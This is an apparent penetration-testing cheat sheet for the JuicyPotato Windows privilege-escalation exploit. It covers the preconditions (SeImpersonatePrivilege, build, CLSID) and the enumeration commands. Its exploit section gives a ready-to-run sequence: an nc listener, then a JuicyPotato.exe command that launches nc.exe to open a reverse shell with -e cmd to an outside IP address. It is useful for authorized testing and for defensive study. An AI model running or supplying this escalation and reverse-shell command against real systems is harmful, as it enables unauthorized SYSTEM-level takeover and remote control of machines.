JuicyPotato targets older COM/DCOM behavior and is build-dependent.
It is generally not reliable on Windows 10 1809 and Server 2019 or newer. Use it only when the target build, privilege, and CLSID conditions match.
For newer builds, check SigmaPotato.
Keep in mind, potato attacks are entirely family of exploits, each behaving slightly different than the other but operationally achieve the same objective.
When enumerating JuicyPotato opportunities, try to identify:
SeImpersonatePrivilegeorSeAssignPrimaryTokenPrivilege- Windows version and build
- Working CLSID for the target OS
- Local COM/RPC behavior not blocked by firewall or hardening
- Payload path and listener
Enumeration
Confirm OS version:
systeminfo
Confirm privileges:
whoami /priv
Interesting findings include:
- Older Windows build
SeImpersonatePrivilegepresent- Compatible CLSID identified
- Tool execution is not blocked
Once the CLSID and build are confirmed, execute a controlled payload. CLSID lists exist around the internet.
Exploit
- Start a listener.
nc -lnvp 9443
- Execute JuicyPotato.
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\Windows\Temp\nc.exe 10.10.14.3 9443 -e cmd" -t * -c {CLSID}
- Verify context.
whoami
whoami /priv
If the tool fails, do not keep throwing random CLSIDs at the target. Recheck build, service context, token privileges, local firewall behavior, and the required COM/RPC path.